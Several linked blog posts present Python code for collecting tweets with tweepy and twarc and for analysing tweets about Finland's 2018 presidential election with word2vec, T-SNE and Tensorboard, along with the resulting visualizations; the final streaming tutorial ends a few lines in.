NLP Analysis Of Tweets Using Word2Vec And T-SNE

In the context of some of the Twitter research I’ve been doing, I decided to try out a few natural language processing (NLP) techniques. So far, word2vec has produced perhaps the most meaningful results. Wikipedia describes word2vec very precisely:

“Word2vec takes as its input a large corpus of text and produces a vector space, typically of several hundred dimensions, with each unique word in the corpus being assigned a corresponding vector in the space. Word vectors are positioned in the vector space such that words that share common contexts in the corpus are located in close proximity to one another in the space.”

During the two weeks leading up to the January 2018 Finnish presidential elections, I performed an analysis of user interactions and behavior on Twitter, based on search terms relevant to that event. During the course of that analysis, I also dumped each Tweet’s raw text field to a text file, one item per line. I then wrote a small tool designed to preprocess the collected Tweets, feed that processed data into word2vec, and finally output some visualizations. Since word2vec creates multidimensional tensors, I’m using T-SNE for dimensionality reduction (the resulting visualizations are in two dimensions, compared to the 200 dimensions of the original data).

The rest of this blog post will be devoted to listing and explaining the code used to perform these tasks. I’ll present the code as it appears in the tool. The code starts with a set of functions that perform processing and visualization tasks. The main routine at the end wraps everything up by calling each routine sequentially, passing artifacts from the previous step to the next one. As such, you can copy-paste each section of code into an editor, save the resulting file, and the tool should run (assuming you’ve pip-installed all dependencies). Note that I’m using two spaces per indent purely to allow the code to format neatly in this blog. Let’s start, as always, with importing dependencies. Off the top of my head, you’ll probably want to install tensorflow, gensim, six, numpy, matplotlib, and sklearn (although I think some of these install as part of tensorflow’s installation).
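If you’re starting from a clean environment, something like the following should cover those dependencies (package names may differ slightly depending on your setup; scikit-learn is the package that provides sklearn):

pip install tensorflow gensim six numpy matplotlib scikit-learn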

# -*- coding: utf-8 -*-
from tensorflow.contrib.tensorboard.plugins import projector
from sklearn.manifold import TSNE
from collections import Counter
from six.moves import cPickle
import gensim.models.word2vec as w2v
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
import multiprocessing
import os
import sys
import io
import re
import json

The next listing contains a few helper functions. In each processing step, I like to save the output. I do this for two reasons. Firstly, depending on the size of your raw data, each step can take some time. Hence, if you’ve performed a step once and saved the output, it can be loaded from disk to save time on subsequent passes. The second reason for saving each step is so that you can examine the output to check that it looks like what you want. The try_load_or_process() function attempts to load the previously saved output from a function. If it doesn’t exist, it runs the function and then saves the output. Note also the rather odd-looking implementation in save_json(). This is a workaround for the fact that json.dump() errors out on certain non-ASCII characters when paired with io.open().

def try_load_or_process(filename, processor_fn, function_arg):
  load_fn = None
  save_fn = None
  if filename.endswith("json"):
    load_fn = load_json
    save_fn = save_json
  else:
    load_fn = load_bin
    save_fn = save_bin
  if os.path.exists(filename):
    return load_fn(filename)
  else:
    ret = processor_fn(function_arg)
    save_fn(ret, filename)
    return ret

def print_progress(current, maximum):
  sys.stdout.write("\r")
  sys.stdout.flush()
  sys.stdout.write(str(current) + "/" + str(maximum))
  sys.stdout.flush()

def save_bin(item, filename):
  with open(filename, "wb") as f:
    cPickle.dump(item, f)

def load_bin(filename):
  if os.path.exists(filename):
    with open(filename, "rb") as f:
      return cPickle.load(f)

def save_json(variable, filename):
  with io.open(filename, "w", encoding="utf-8") as f:
    f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def load_json(filename):
  ret = None
  if os.path.exists(filename):
    try:
      with io.open(filename, "r", encoding="utf-8") as f:
        ret = json.load(f)
    except:
      pass
  return ret

Moving on, let’s look at the first preprocessing step. This function takes the raw text strings dumped from Tweets, removes unwanted characters and features (such as user names and URLs), removes duplicates, and returns a list of sanitized strings. Here, I’m not using string.printable for a list of characters to keep, since Finnish includes additional letters that aren’t part of the English alphabet (äöåÄÖÅ). The regular expressions used in this step have been somewhat tailored for the raw input data. Hence, you may need to tweak them for your own input corpus.

def process_raw_data(input_file):
  valid = u"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ#@.:/ äöåÄÖÅ"
  url_match = "(https?:\/\/[0-9a-zA-Z\-\_]+\.[\-\_0-9a-zA-Z]+\.?[0-9a-zA-Z\-\_]*\/?.*)"
  name_match = "\@[\_0-9a-zA-Z]+\:?"
  lines = []
  print("Loading raw data from: " + input_file)
  if os.path.exists(input_file):
    with io.open(input_file, 'r', encoding="utf-8") as f:
      lines = f.readlines()
  num_lines = len(lines)
  ret = []
  for count, text in enumerate(lines):
    if count % 50 == 0:
      print_progress(count, num_lines)
    text = re.sub(url_match, u"", text)
    text = re.sub(name_match, u"", text)
    text = re.sub("\&amp\;?", u"", text)
    text = re.sub("[\:\.]{1,}$", u"", text)
    text = re.sub("^RT\:?", u"", text)
    text = u''.join(x for x in text if x in valid)
    text = text.strip()
    if len(text.split()) > 5:
      if text not in ret:
        ret.append(text)
  return ret

The next step is to tokenize each sentence (or Tweet) into words.

def tokenize_sentences(sentences):
  ret = []
  max_s = len(sentences)
  print("Got " + str(max_s) + " sentences.")
  for count, s in enumerate(sentences):
    tokens = []
    words = re.split(r'(\s+)', s)
    if len(words) > 0:
      for w in words:
        if w is not None:
          w = w.strip()
          w = w.lower()
          if w.isspace() or w == "\n" or w == "\r":
            w = None
          if w is not None and len(w) < 1:
            w = None
          if w is not None:
            tokens.append(w)
    if len(tokens) > 0:
      ret.append(tokens)
    if count % 50 == 0:
      print_progress(count, max_s)
  return ret

The final text preprocessing step removes unwanted tokens. This includes numeric data and stop words. Stop words are the most common words in a language. We omit them from processing in order to bring out the meaning of the text in our analysis. I downloaded a json dump of stop words for all languages from here, and placed it in the same directory as this script. If you plan on trying this code out yourself, you’ll need to perform the same steps. Note that I included extra stopwords of my own. After looking at the output of this step, I noticed that Twitter’s truncation of some tweets caused certain word fragments to occur frequently.

def clean_sentences(tokens):
  all_stopwords = load_json("stopwords-iso.json")
  extra_stopwords = ["ssä", "lle", "h.", "oo", "on", "muk", "kov", "km", "ia", "täm", "sy", "but", ":sta", "hi", "py", "xd", "rr", "x:", "smg", "kum", "uut", "kho", "k", "04n", "vtt", "htt", "väy", "kin", "#8", "van", "tii", "lt3", "g", "ko", "ett", "mys", "tnn", "hyv", "tm", "mit", "tss", "siit", "pit", "viel", "sit", "n", "saa", "tll", "eik", "nin", "nii", "t", "tmn", "lsn", "j", "miss", "pivn", "yhn", "mik", "tn", "tt", "sek", "lis", "mist", "tehd", "sai", "l", "thn", "mm", "k", "ku", "s", "hn", "nit", "s", "no", "m", "ky", "tst", "mut", "nm", "y", "lpi", "siin", "a", "in", "ehk", "h", "e", "piv", "oy", "p", "yh", "sill", "min", "o", "va", "el", "tyn", "na", "the", "tit", "to", "iti", "tehdn", "tlt", "ois", ":", "v", "?", "!", "&"]
  stopwords = None
  if all_stopwords is not None:
    stopwords = all_stopwords["fi"]
    stopwords += extra_stopwords
  ret = []
  max_s = len(tokens)
  for count, sentence in enumerate(tokens):
    if count % 50 == 0:
      print_progress(count, max_s)
    cleaned = []
    for token in sentence:
      if len(token) > 0:
        if stopwords is not None:
          if token in stopwords:
            token = None
        if token is not None:
          if re.search("^[0-9\.\-\s\/]+$", token):
            token = None
        if token is not None:
          cleaned.append(token)
    if len(cleaned) > 0:
      ret.append(cleaned)
  return ret

The next function creates a vocabulary from the processed text. A vocabulary, in this context, is basically a list of all unique tokens in the data. This function creates a frequency distribution of all tokens (words) by counting the number of occurrences of each token. We will use this later to “trim” the vocabulary down to a manageable size.

def get_word_frequencies(corpus):
  frequencies = Counter()
  for sentence in corpus:
    for word in sentence:
      frequencies[word] += 1
  freq = frequencies.most_common()
  return freq

Now that we’re done with all the preprocessing steps, let’s get into the more interesting analysis functions. The following function accepts the tokenized and cleaned data generated from the steps above, and uses it to train a word2vec model. The num_features parameter sets the number of features each word is assigned (and hence the dimensionality of the resulting tensor). It is recommended to set it between 100 and 1000. Naturally, larger values take more processing power and memory/disk space to handle. I found 200 to be enough, but I normally start with a value of 300 when looking at new datasets. The min_count variable passed to word2vec designates how to trim the vocabulary. For example, if min_count is set to 3, all words that appear in the data set fewer than 3 times will be discarded from the vocabulary used when training the word2vec model. In the dimensionality reduction step we perform later, large vocabulary sizes cause T-SNE iterations to take a long time. Hence, I tuned min_count to generate a vocabulary of around 10,000 words. Increasing the value of sample will cause word2vec to randomly omit words with high frequency counts. I decided that I wanted to keep all of those words in my analysis, so it’s set to zero. Increasing epoch_count will cause word2vec to train for more iterations, which will, naturally, take longer. Increase this if you have a fast machine or plenty of time on your hands 🙂

def get_word2vec(sentences):
  num_workers = multiprocessing.cpu_count()
  num_features = 200
  epoch_count = 10
  sentence_count = len(sentences)
  w2v_file = os.path.join(save_dir, "word_vectors.w2v")
  word2vec = None
  if os.path.exists(w2v_file):
    print("w2v model loaded from " + w2v_file)
    word2vec = w2v.Word2Vec.load(w2v_file)
  else:
    word2vec = w2v.Word2Vec(sg=1,
                            seed=1,
                            workers=num_workers,
                            size=num_features,
                            min_count=min_frequency_val,
                            window=5,
                            sample=0)

    print("Building vocab...")
    word2vec.build_vocab(sentences)
    print("Word2Vec vocabulary length:", len(word2vec.wv.vocab))
    print("Training...")
    word2vec.train(sentences, total_examples=sentence_count, epochs=epoch_count)
    print("Saving model...")
    word2vec.save(w2v_file)
  return word2vec

Tensorboard has some good tools to visualize word embeddings in the word2vec model we just created. These visualizations can be accessed using the “projector” tab in the interface. Here’s code to create tensorboard embeddings:

def create_embeddings(word2vec):
  all_word_vectors_matrix = word2vec.wv.syn0
  num_words = len(all_word_vectors_matrix)
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  dim = word2vec.wv[vocab[0]].shape[0]
  embedding = np.empty((num_words, dim), dtype=np.float32)
  metadata = ""
  for i, word in enumerate(vocab):
    embedding[i] = word2vec.wv[word]
    metadata += word + "\n"
  metadata_file = os.path.join(save_dir, "metadata.tsv")
  with io.open(metadata_file, "w", encoding="utf-8") as f:
    f.write(metadata)

  tf.reset_default_graph()
  sess = tf.InteractiveSession()
  X = tf.Variable([0.0], name='embedding')
  place = tf.placeholder(tf.float32, shape=embedding.shape)
  set_x = tf.assign(X, place, validate_shape=False)
  sess.run(tf.global_variables_initializer())
  sess.run(set_x, feed_dict={place: embedding})

  summary_writer = tf.summary.FileWriter(save_dir, sess.graph)
  config = projector.ProjectorConfig()
  embedding_conf = config.embeddings.add()
  embedding_conf.tensor_name = 'embedding:0'
  embedding_conf.metadata_path = 'metadata.tsv'
  projector.visualize_embeddings(summary_writer, config)

  save_file = os.path.join(save_dir, "model.ckpt")
  print("Saving session...")
  saver = tf.train.Saver()
  saver.save(sess, save_file)

Once this code has been run, tensorflow log entries will be created in save_dir. To start a tensorboard session, run the following command from the directory where this script was run:

tensorboard --logdir=save_dir

You should see output like the following once you’ve run the above command:

TensorBoard 0.4.0rc3 at http://node.local:6006 (Press CTRL+C to quit)

Navigate your web browser to localhost:<port_number> to see the interface. From the “Inactive” pulldown menu, select “Projector”.

The “projector” menu is often hiding under the “inactive” pulldown.

Once you’ve selected “projector”, you should see a view like this:

Tensorboard’s projector view allows you to interact with word embeddings, search for words, and even run t-sne on the dataset.

There are a lot of things to play around with in this view. You can search for words, fly around the embeddings, and even run t-sne (on the bottom left) on the dataset. If you get to this step, have fun playing with the interface!

And now, back to the code. One of word2vec’s most interesting functions is finding similarities between words. This is done via the word2vec.wv.most_similar() call. The following function calls word2vec.wv.most_similar() for a word and returns the num_similar most similar words. The returned value is a list containing the queried word, and a list of similar words ( [queried_word, [similar_word1, similar_word2, …]] ).

def most_similar(input_word, num_similar):
  sim = word2vec.wv.most_similar(input_word, topn=num_similar)
  output = []
  found = []
  for item in sim:
    w, n = item
    found.append(w)
  output = [input_word, found]
  return output

The following function takes a list of words to be queried, passes them to the above function, saves the output, and also passes the queried words to t_sne_scatterplot(), which we’ll show later. It also writes a csv file – associations.csv – which can be imported into Gephi to generate graphing visualizations. You can see some Gephi-generated visualizations in the accompanying blog post.

I find that manually viewing the word2vec_test.json file generated by this function is a good way to read the list of similarities found for each word queried with wv.most_similar().

def test_word2vec(test_words):
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  output = []
  associations = {}
  test_items = test_words
  for count, word in enumerate(test_items):
    if word in vocab:
      print("[" + str(count+1) + "] Testing: " + word)
      if word not in associations:
        associations[word] = []
      similar = most_similar(word, num_similar)
      t_sne_scatterplot(word)
      output.append(similar)
      for s in similar[1]:
        if s not in associations[word]:
          associations[word].append(s)
    else:
      print("Word " + word + " not in vocab")
  filename = os.path.join(save_dir, "word2vec_test.json")
  save_json(output, filename)
  filename = os.path.join(save_dir, "associations.json")
  save_json(associations, filename)
  filename = os.path.join(save_dir, "associations.csv")
  handle = io.open(filename, "w", encoding="utf-8")
  handle.write(u"Source,Target\n")
  for w, sim in associations.iteritems():
    for s in sim:
      handle.write(w + u"," + s + u"\n")
  handle.close()
  return output

The next function implements standalone code for creating a scatterplot from the output of T-SNE on a set of data points obtained from a word2vec.wv.most_similar() query. The scatterplot is visualized with matplotlib. Unfortunately, my matplotlib skills leave a lot to be desired, and these graphs don’t look great. But they’re readable.

def t_sne_scatterplot(word):
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  dim0 = word2vec.wv[vocab[0]].shape[0]
  arr = np.empty((0, dim0), dtype='f')
  w_labels = [word]
  nearby = word2vec.wv.similar_by_word(word, topn=num_similar)
  arr = np.append(arr, np.array([word2vec[word]]), axis=0)
  for n in nearby:
    w_vec = word2vec[n[0]]
    w_labels.append(n[0])
    arr = np.append(arr, np.array([w_vec]), axis=0)

  tsne = TSNE(n_components=2, random_state=1)
  np.set_printoptions(suppress=True)
  Y = tsne.fit_transform(arr)
  x_coords = Y[:, 0]
  y_coords = Y[:, 1]

  plt.rc("font", size=16)
  plt.figure(figsize=(16, 12), dpi=80)
  plt.scatter(x_coords[0], y_coords[0], s=800, marker="o", color="blue")
  plt.scatter(x_coords[1:], y_coords[1:], s=200, marker="o", color="red")

  for label, x, y in zip(w_labels, x_coords, y_coords):
    plt.annotate(label.upper(), xy=(x, y), xytext=(0, 0), textcoords='offset points')
  plt.xlim(x_coords.min()-50, x_coords.max()+50)
  plt.ylim(y_coords.min()-50, y_coords.max()+50)
  filename = os.path.join(plot_dir, word + "_tsne.png")
  plt.savefig(filename)
  plt.close()

In order to create a scatterplot of the entire vocabulary, we need to perform T-SNE over that whole dataset. This can be a rather time-consuming operation. The next function performs that operation, attempting to save and re-load intermediate steps (since some of them can take over 30 minutes to complete).

def calculate_t_sne():
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  arr = np.empty((0, dim0), dtype='f')
  labels = []
  vectors_file = os.path.join(save_dir, "vocab_vectors.npy")
  labels_file = os.path.join(save_dir, "labels.json")
  if os.path.exists(vectors_file) and os.path.exists(labels_file):
    print("Loading pre-saved vectors from disk")
    arr = load_bin(vectors_file)
    labels = load_json(labels_file)
  else:
    print("Creating an array of vectors for each word in the vocab")
    for count, word in enumerate(vocab):
      if count % 50 == 0:
        print_progress(count, vocab_len)
      w_vec = word2vec[word]
      labels.append(word)
      arr = np.append(arr, np.array([w_vec]), axis=0)
    save_bin(arr, vectors_file)
    save_json(labels, labels_file)

  x_coords = None
  y_coords = None
  x_c_filename = os.path.join(save_dir, "x_coords.npy")
  y_c_filename = os.path.join(save_dir, "y_coords.npy")
  if os.path.exists(x_c_filename) and os.path.exists(y_c_filename):
    print("Reading pre-calculated coords from disk")
    x_coords = load_bin(x_c_filename)
    y_coords = load_bin(y_c_filename)
  else:
    print("Computing T-SNE for array of length: " + str(len(arr)))
    tsne = TSNE(n_components=2, random_state=1, verbose=1)
    np.set_printoptions(suppress=True)
    Y = tsne.fit_transform(arr)
    x_coords = Y[:, 0]
    y_coords = Y[:, 1]
    print("Saving coords.")
    save_bin(x_coords, x_c_filename)
    save_bin(y_coords, y_c_filename)
  return x_coords, y_coords, labels, arr

The next function takes the data calculated in the above step, and data obtained from test_word2vec(), and plots the results from each word queried on the scatterplot of the entire vocabulary. These plots are useful for visualizing which words are closer to others, and where clusters commonly pop up. This is the last function before we get onto the main routine.

def show_cluster_locations(results, labels, x_coords, y_coords):
  for item in results:
    name = item[0]
    print("Plotting graph for " + name)
    similar = item[1]
    in_set_x = []
    in_set_y = []
    out_set_x = []
    out_set_y = []
    name_x = 0
    name_y = 0
    for count, word in enumerate(labels):
      xc = x_coords[count]
      yc = y_coords[count]
      if word == name:
        name_x = xc
        name_y = yc
      elif word in similar:
        in_set_x.append(xc)
        in_set_y.append(yc)
      else:
        out_set_x.append(xc)
        out_set_y.append(yc)
    plt.figure(figsize=(16, 12), dpi=80)
    plt.scatter(name_x, name_y, s=400, marker="o", c="blue")
    plt.scatter(in_set_x, in_set_y, s=80, marker="o", c="red")
    plt.scatter(out_set_x, out_set_y, s=8, marker=".", c="black")
    filename = os.path.join(big_plot_dir, name + "_tsne.png")
    plt.savefig(filename)
    plt.close()

Now let’s write our main routine, which will call all the above functions, process our collected Twitter data, and generate visualizations. The first few lines take care of our three preprocessing steps, and generation of a frequency distribution / vocabulary. The script expects the raw Twitter data to reside in a relative path (data/tweets.txt). Change those variables as needed. Also, all output is saved to a subdirectory in the relative path (analysis/). Again, tailor this to your needs.

if __name__ == '__main__':
  input_dir = "data"
  save_dir = "analysis"
  if not os.path.exists(save_dir):
    os.makedirs(save_dir)

  print("Preprocessing raw data")
  raw_input_file = os.path.join(input_dir, "tweets.txt")
  filename = os.path.join(save_dir, "data.json")
  processed = try_load_or_process(filename, process_raw_data, raw_input_file)
  print("Unique sentences: " + str(len(processed)))

  print("Tokenizing sentences")
  filename = os.path.join(save_dir, "tokens.json")
  tokens = try_load_or_process(filename, tokenize_sentences, processed)

  print("Cleaning tokens")
  filename = os.path.join(save_dir, "cleaned.json")
  cleaned = try_load_or_process(filename, clean_sentences, tokens)

  print("Getting word frequencies")
  filename = os.path.join(save_dir, "frequencies.json")
  frequencies = try_load_or_process(filename, get_word_frequencies, cleaned)
  vocab_size = len(frequencies)
  print("Unique words: " + str(vocab_size))

Next, I trim the vocabulary and save the resulting list of words. This allows me to look over the trimmed list and ensure that the words I’m interested in survived the trimming operation. Due to the nature of the Finnish language (and Twitter), the vocabulary of our “cleaned” set, prior to trimming, was over 100,000 unique words. After trimming, it ended up at around 11,000 words.

  trimmed_vocab = []
  min_frequency_val = 6
  for item in frequencies:
    if item[1] >= min_frequency_val:
      trimmed_vocab.append(item[0])
  trimmed_vocab_size = len(trimmed_vocab)
  print("Trimmed vocab length: " + str(trimmed_vocab_size))
  filename = os.path.join(save_dir, "trimmed_vocab.json")
  save_json(trimmed_vocab, filename)

The next few lines do all the compute-intensive work. We’ll create a word2vec model with the cleaned token set, create tensorboard embeddings (for the visualizations mentioned above), and calculate T-SNE. Yes, this part can take a while to run, so go put the kettle on.

  print
  print("Instantiating word2vec model")
  word2vec = get_word2vec(cleaned)
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  print("word2vec vocab contains " + str(vocab_len) + " items.")
  dim0 = word2vec.wv[vocab[0]].shape[0]
  print("word2vec items have " + str(dim0) + " features.")

  print("Creating tensorboard embeddings")
  create_embeddings(word2vec)

  print("Calculating T-SNE for word2vec model")
  x_coords, y_coords, labels, arr = calculate_t_sne()

Finally, we’ll take the top 50 most frequent words from our frequency distribution, query each of them for the 40 most similar words, and plot both a labelled graph of each set and a “big plot” of that set against the entire vocabulary.

  plot_dir = os.path.join(save_dir, "plots")
  if not os.path.exists(plot_dir):
    os.makedirs(plot_dir)

  num_similar = 40
  test_words = []
  for item in frequencies[:50]:
    test_words.append(item[0])
  results = test_word2vec(test_words)

  big_plot_dir = os.path.join(save_dir, "big_plots")
  if not os.path.exists(big_plot_dir):
    os.makedirs(big_plot_dir)
  show_cluster_locations(results, labels, x_coords, y_coords)

And that’s it! Rather a lot of code, but it does quite a few useful tasks. If you’re interested in seeing the visualizations I created using this tool against the Tweets collected from the January 2018 Finnish presidential elections, check out this blog post.



NLP Analysis And Visualizations Of #presidentinvaalit2018

During the lead-up to the January 2018 Finnish presidential elections, I collected a dataset consisting of raw Tweets gathered from search words related to the election. I then performed a series of natural language processing experiments on this raw data. The methodology, including all the code used, can be found in an accompanying blog post. This article details the results of my experiments, and shows some of the visualizations generated.

I pre-processed the raw dataset, used it to train a word2vec model, and then used that model to perform analyses using word2vec.wv.most_similar(), T-SNE, and Tensorboard.

My first experiment involved creating scatterplots of words found to be similar to frequently encountered tokens within the Twitter data. I looked at the 50 most frequent tokens encountered in this way, and used T-SNE to reduce the dimensionality of the set of vectors generated in each case. Results were plotted using matplotlib. Here are a few examples of the output generated.

T-SNE scatterplot of the 40 most similar words to #laura2018

Here you can see that word2vec easily identified other hashtags related to the #laura2018 campaign, including #suomitakaisin, #suomitakas, #siksilaura and #siksips. Laura Huhtasaari was candidate number 5 on the voting slip, and that was also identified, along with other hashtags associated with her name.

T-SNE scatterplot of the 40 most similar words to #turpo

Here’s an analysis of the hashtag #turpo (short for turvallisuuspolitiikka – National Security). Here you can see that word2vec identified many references to NATO (one issue that was touched upon during election campaigning), jäsenyys (membership), #ulpo – ulkopolitiikka (Foreign Policy), and references to regions and countries (venäjä – Russia, ruotsi – Sweden, itämeri – Baltic).

T-SNE scatterplot of the 40 most similar words to venäjä

On a similar note, here’s a scatterplot of words similar to venäjä (Russia). As expected, word2vec identified NATO in close relationship. Names of countries are expected to register as similar in word2vec, and we see Ruotsi (Sweden), Ukraine, USA, Turkki (Turkey), Syria, and Kiina (China). Word2vec also finds the word Putin to be similar, and interestingly, Neuvostoliitto (USSR) was mentioned in the Twitter data.

T-SNE scatterplot of the 40 most similar words to presidentti

Above is a scatterplot based on the word “presidentti” (president). Note how word2vec identified Halonen, Urho, Kekkonen, Donald, and Trump.

Moving on, I took the names of the eight presidential candidates in Sunday’s election, and plotted them, along with the 40 most similar guesses from word2vec, on scatterplots of the entire vocabulary. Here are the results.

All candidates plotted against the full vocabulary. The blue dot is the target. Red dots are similar tokens.

As you can see above, all of the candidates occupied separate spaces on the graph, and there was very little overlap amongst words similar to each candidate’s name.

I created word embeddings using Tensorflow, and opened the resulting log files in Tensorboard in order to produce some visualizations with that tool. Here are some of the outputs.

Tensorboard visualization of words related to #haavisto2018 on a 2D representation of word embeddings, dimensionally reduced using T-SNE

The above shows word vectors in close proximity to #haavisto2018, based on the embeddings I created (from the word2vec model). Here you can find references to Tavastia, a club in Helsinki where Pekka Haavisto’s campaign hosted an event on 20th January 2018. Words clearly associated with this event include liput (tickets), ilta (evening), livenä (live), and biisejä (songs). The event was called “Siksipekka”. Here’s a view of that hashtag.

Again, we see similar words, including konsertti (concert). Another nearby word vector identified was #vihreät (the green party).

In my last experiment, I compiled lists of similar words for all of the top 50 most frequent words found in the Twitter data, and recorded associations between the lists generated. I imported this data into Gephi, and generated some graphs with it.

I got interested in Gephi after recently collaborating with Erin Gallagher (@3r1nG) to visualize the data I collected on some bots found to be following Finnish recommended Twitter accounts. I highly recommend that you check out some of her other blog posts, where you’ll see some amazing visualizations. Gephi is a powerful tool, but it takes quite some time to master. As you’ll see, my attempts at using it pale in comparison to what Erin can do.

A zoomed-out view of the mapping between the 40 most similar words to the 50 most frequent words in the Twitter data collected

The above is a graph of all the words found. Larger circles indicate that a word has more other words associated with it.

A zoomed-in view of some of the candidates

Here’s a zoom-in on some of the candidates. Note that I treated hashtags as unique words, which turned out to be useful for this analysis. For reference, here are a few translations: äänestää = to vote, vaalit = elections, puhuu = to speak, presidenttiehdokas = presidential candidate.

Words related to foreign policy and national security

Here is a zoomed-in view of the words associated with foreign policy and national security.

Words associated with Suomi (Finland)

Finally, here are some words associated with #suomi (Finland). Note lots of references to nature (luonto), winter (talvi), and snow (lumi).

As you might have gathered, word2vec finds interesting and fairly accurate associations between words, even in messy data such as Tweets. I plan on delving further into this area in hopes of finding some techniques that might improve the Twitter research I’ve been doing. The dataset collected during the Finnish elections was fairly small (under 150,000 Tweets). Many of the other datasets I work with are orders of magnitude larger. Hence I’m particularly interested in figuring out if there’s a way to accurately cluster Twitter data using these techniques.

 



How To Get Tweets From A Twitter Account Using Python And Tweepy

In this blog post, I’ll explain how to obtain data from a specified Twitter account using tweepy and Python. Let’s jump straight into the code!

As usual, we’ll start off by importing dependencies. I’ll use the datetime and Counter modules later on to do some simple analysis tasks.

from tweepy import OAuthHandler
from tweepy import API
from tweepy import Cursor
from datetime import datetime, date, time, timedelta
from collections import Counter
import sys

The next bit creates a tweepy API object that we will use to query for data from Twitter. As usual, you’ll need to create a Twitter application in order to obtain the relevant authentication keys and fill in those empty strings. You can find a link to a guide about that in one of the previous articles in this series.

consumer_key=""
consumer_secret=""
access_token=""
access_token_secret=""

auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
auth_api = API(auth)

Names of accounts to be queried will be passed in as command-line arguments. I’m going to exit the script if no args are passed, since there would be no reason to continue.

account_list = []
if (len(sys.argv) > 1):
  account_list = sys.argv[1:]
else:
  print("Please provide a list of usernames at the command line.")
  sys.exit(0)

Next, let’s iterate through the account names passed and use tweepy’s API.get_user() to obtain a few details about the queried account.

if len(account_list) > 0:
  for target in account_list:
    print("Getting data for " + target)
    item = auth_api.get_user(target)
    print("name: " + item.name)
    print("screen_name: " + item.screen_name)
    print("description: " + item.description)
    print("statuses_count: " + str(item.statuses_count))
    print("friends_count: " + str(item.friends_count))
    print("followers_count: " + str(item.followers_count))

Twitter User objects contain a created_at field that holds the creation date of the account. We can use this to calculate the age of the account, and since we also know how many Tweets that account has published (statuses_count), we can calculate the account’s average number of Tweets per day. Tweepy provides time-related values as datetime objects, which make it easy to calculate things like time deltas.

    tweets = item.statuses_count
    account_created_date = item.created_at
    delta = datetime.utcnow() - account_created_date
    account_age_days = delta.days
    print("Account age (in days): " + str(account_age_days))
    if account_age_days > 0:
      print("Average tweets per day: " + "%.2f"%(float(tweets)/float(account_age_days)))

Next, let’s iterate through the user’s Tweets using tweepy’s API.user_timeline(). Tweepy’s Cursor allows us to stream data from the query without having to manually query for more data in batches. The Twitter API will return around 3200 Tweets using this method (which can take a while). To make things quicker, and to show another example of datetime usage, we’re going to break out of the loop once we hit Tweets that are more than 30 days old. While looping, we’ll collect lists of all hashtags and mentions seen in Tweets.

    hashtags = []
    mentions = []
    tweet_count = 0
    end_date = datetime.utcnow() - timedelta(days=30)
    for status in Cursor(auth_api.user_timeline, id=target).items():
      tweet_count += 1
      if hasattr(status, "entities"):
        entities = status.entities
        if "hashtags" in entities:
          for ent in entities["hashtags"]:
            if ent is not None:
              if "text" in ent:
                hashtag = ent["text"]
                if hashtag is not None:
                  hashtags.append(hashtag)
        if "user_mentions" in entities:
          for ent in entities["user_mentions"]:
            if ent is not None:
              if "screen_name" in ent:
                name = ent["screen_name"]
                if name is not None:
                  mentions.append(name)
      if status.created_at < end_date:
        break

Finally, we’ll use Counter.most_common() to print out the ten most used hashtags and mentions.

    print("")
    print("Most mentioned Twitter users:")
    for item, count in Counter(mentions).most_common(10):
      print(item + "\t" + str(count))

    print("")
    print("Most used hashtags:")
    for item, count in Counter(hashtags).most_common(10):
      print(item + "\t" + str(count))

    print("")
    print("All done. Processed " + str(tweet_count) + " tweets.")
    print("")

And that’s it. A simple tool. But effective. And, of course, you can extend this code in any direction you like.
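For example, here’s a minimal sketch of one possible extension: a breakdown of the hours of the day during which the account is most active. It assumes you append each status to a list (e.g. statuses.append(status)) inside the Cursor loop above; the function and variable names are my own, not part of tweepy.

def print_activity_hours(statuses, top=5):
  # Count tweets per hour of day (UTC), using each status' created_at datetime
  hours = Counter()
  for status in statuses:
    hours[status.created_at.hour] += 1
  print("Most active hours (UTC):")
  for hour, count in hours.most_common(top):
    print(str(hour).zfill(2) + ":00\t" + str(count))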



How To Get Streaming Data From Twitter

I occasionally receive requests to share my Twitter analysis tools. After a few recent requests, it finally occurred to me that it would make sense to create a series of articles that describe how to use Python and the Twitter API to perform basic analytical tasks. Teach a man to fish, and all that.

In this blog post, I’ll describe how to obtain streaming data using Python and the Twitter API.

I’m using twarc instead of tweepy to gather data from Twitter streams. I recently switched to twarc because it has a simpler interface than tweepy, and it handles most network and Twitter errors automatically.

In this article, I’ll provide two examples. The first one covers the simplest way to get streaming data from Twitter. Let’s start by importing our dependencies.

from twarc import Twarc
import sys

Next, create a twarc session. For this, you’ll need to create a Twitter application in order to obtain the relevant authentication keys and fill in those empty strings. You can find many guides on the Internet for this. Here’s one.

if __name__ == '__main__':
  consumer_key=""
  consumer_secret=""
  access_token=""
  access_token_secret=""

  twarc = Twarc(consumer_key, consumer_secret, access_token, access_token_secret)

For the sake of brevity, let’s assume search terms will be passed as a list on the command line. We’ll simply accept that list without checking its validity. Your own implementation should probably do more.

  target_list = []
  if (len(sys.argv) > 1):
    target_list = sys.argv[1:]

Finally, we’ll check if we have any search targets. If we do, we’ll create a search query. If not, we’ll attach to the sample stream.

  if len(target_list) > 0:
    query = ",".join(target_list)
    print "Search: " + query
    for tweet in twarc.filter(track = query):
      print_tweet(tweet)
  else:
    print "Getting 1% sample."
    for tweet in twarc.sample():
      print_tweet(tweet)

Here’s a function to print the “text” field of each tweet we receive from the stream. If you assemble these snippets into a single script, define this function above the main block so it exists before the stream starts.

def print_tweet(status):
  if "text" in status:
    print status["text"]

And that’s it. In just over 20 lines of code, you can attach to a Twitter stream, receive Tweets, and process (or in this case, print) them.

In my second example, incoming Tweet objects will be pushed onto a queue in the main thread, while a second processing thread will pull those objects off the queue and process them. The reason we would want to separate gathering and processing into separate threads is to prevent any blocking by the processing step. Although in this example, simply printing a Tweet’s text out is unlikely to block under normal circumstances, once your processing code becomes more complex, blocking is more likely to occur. By offloading processing to a separate thread, your script should be able to handle things such as heavy Tweet volume spikes, writing to disk, communicating over the network, using machine learning models, and working with large frequency distribution maps.

As before, we’ll start by importing dependencies. We’re including threading (for multithreading), Queue (to manage a queue), and time (for time.sleep).

from twarc import Twarc
import Queue
